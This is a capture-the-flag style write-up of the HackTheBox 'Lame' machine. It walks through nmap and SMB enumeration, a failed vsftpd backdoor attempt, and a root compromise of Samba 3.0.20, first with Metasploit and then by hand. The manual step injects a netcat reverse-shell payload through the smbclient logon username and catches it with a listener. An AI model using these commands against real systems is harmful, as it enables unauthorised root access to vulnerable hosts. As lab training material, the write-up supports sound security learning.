Lame - HackTheBox
TL:DR
This writeup is based on Lame on Hack the box. It was a Linux box. It starts with two major services, vsftpd, and Samba. We tried FTP logon but didn’t get anything interesting. Then try to exploit Samba service via command injection in the username field. Using samba service exploitation, we got a shell, then later using directory listing, we got the user flag and the root flag.
Scanning Network
I started with a Nmap scan, I found ports 21, 22, 139, and 445 as FTP, SSH, NetBIOS-ssn, and Microsoft-ds respectively. I got FTP login allowed via anonymous user and Samba service. By Nmap’s banner grabbing, we got the Samba version that is 3.0.20. Let’s see the Nmap result.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
Command - nmap -sV -A <ip address>
Nmap scan report for 10.129.127.33
Host is up (0.57s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.23
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m26s, deviation: 2h49m43s, median: 25s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-04-01T06:39:27-04:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
In Nmap scan, we get the versions of both services, vsftpd 2.3.4 and Samba 3.0.20 and also we get the login information of the FTP. As per the version of both services, it looks like we have exploits available for both. With this information of both services now moves towards to next phase.
Enumeration
In the enumeration phase, we will first enumerate the FTP via anonymous user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Command - ftp 10.129.127.33
Connected to 10.129.127.33.
220 (vsFTPd 2.3.4)
Name (<ip address>:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> pwd
257 "/"
ftp>
As we enumerated FTP, we didn’t anything interesting, but we know that FTP is vulnerable so we can try to exploit it in the exploitation phase. Now, let’s move to Samba service.
Here, we can enumerate Samba using smbmap to get more information about the machine.
1
2
3
4
5
6
7
8
9
10
Command - smbmap -H 10.129.127.33
[+] IP: 10.129.127.33:445 Name: 10.129.127.33
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
We get to know that the samba service provides read and write access to tmp directory. Now, we can do a recursive scan to identify more information about it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Command - smbmap -H 10.129.127.33 -R
[+] IP: 10.129.127.33:445 Name: 10.129.127.33
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
.\tmp*
dr--r--r-- 0 Thu Apr 1 07:09:11 2021 .
dw--w--w-- 0 Sat Oct 31 02:33:57 2020 ..
dr--r--r-- 0 Thu Apr 1 06:33:10 2021 .ICE-unix
dw--w--w-- 0 Thu Apr 1 06:33:33 2021 vmware-root
dr--r--r-- 0 Thu Apr 1 06:33:35 2021 .X11-unix
fw--w--w-- 11 Thu Apr 1 06:33:35 2021 .X0-lock
fw--w--w-- 0 Thu Apr 1 06:34:22 2021 5581.jsvc_up
fw--w--w-- 1600 Thu Apr 1 06:33:08 2021 vgauthsvclog.txt.0
.\tmp.X11-unix*
dr--r--r-- 0 Thu Apr 1 06:33:35 2021 .
dr--r--r-- 0 Thu Apr 1 07:09:11 2021 ..
fr--r--r-- 0 Thu Apr 1 06:33:35 2021 X0
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
By doing a recursive scan, we get to know what content is stored in the tmp directory. Now, we will first move toward the FTP exploitation and try to exploit it.
Exploitation
FTP Exploitation
Here, we can use searchsploit to find the exploit.
1
2
3
4
5
msf6 > search vsftpd 2.3.4
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
As we get vsftpd 2.3.4 – Backdoor Command Execution (Metasploit). Let’s exploit it using Metasploit.
1
2
3
4
5
6
7
8
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.129.127.33
RHOSTS => <ip address>
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.129.127.200:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.127.200:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
As you are able to see above, we provided the machine IP address as an RHOSTS(Remote Host Computer) and our local IP address(tun0) as an LHOST(Local Host Computer or tun0). So, we can exploit the FTP using a backdoor but we didn’t get a shell. So, now let’s move to smb exploitation manually as well as using the Metasploit.
Samba Exploitation (Using Metasploit)
We can search samba with version on metasploit and find a suitable exploit for it.
1
2
3
4
5
6
7
8
9
10
11
msf6 > searchsploit Samba 3.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
1 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
2 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
3 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
4 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
I will use exploit/multi/samba/usermap_script to exploit the service (use 2).
1
2
3
4
5
6
7
8
9
10
msf6 exploit(multi/samba/usermap_script) > set RHOSTS <machine ip address>
RHOSTS => 10.129.84.98
msf6 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/samba/usermap_script) > exploit
whoami
root
python -c 'import pty;pty.spawn("/bin/bash")'
root@lame:/#
Samba Exploiation (Manual)
Command Injection
We can try to login into tmp folder in the samba service using smbclient. We got an error in connection because this machine is of the older version, so we can provide that same version using options.
1
2
3
Command - smbclient -N //<ip address>/tmp
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
Command - smbclient -N //<ip address>/tmp --option='client min protocol=NT1'
After providing same version of Samba, we get the write access in tmp directory. Now we can try to do command injection in the username field by using payload and on another terminal, we have to open the Netcat to listen on a port.
We know that vulnerability has been exploited using command injection in the username. The payload includes nohup(which is used to end the shell after a long time) and we put the listener command (nc) along with our local IP address and port, and then /bin/sh, which provides a shell on the system. we can also use /bin/bash as its another common shell present on linux.
1
Payload for username - logon "/=nohup nc -nv 10.10.14.3 4444 -e /bin/sh"
1
2
3
4
5
6
7
smbclient -N //<ip address>/tmp --option='client min protocol=NT1'
Anonymous login successful
Try "help" to get a list of possible commands.
smb: > logon "/=nohup nc -nv <receiver IP address> 4444 -e /bin/sh"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: >
Now, we have to open listener using Netcat on another terminal to get back the system shell of the machine.
1
Command - nc -lvnp 4444
1
2
3
4
5
6
listening on [any] 4444 …
connect to [<receiver ip address] from (UNKNOWN) [<machine ip address>] 35739
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/#
As mentioned above, I used python -c ‘import pty; pty.spawn(“/bin/bash”)’, to get a interactive shell.
Thanks for reading this far. If you enjoyed the writeup, do support me here.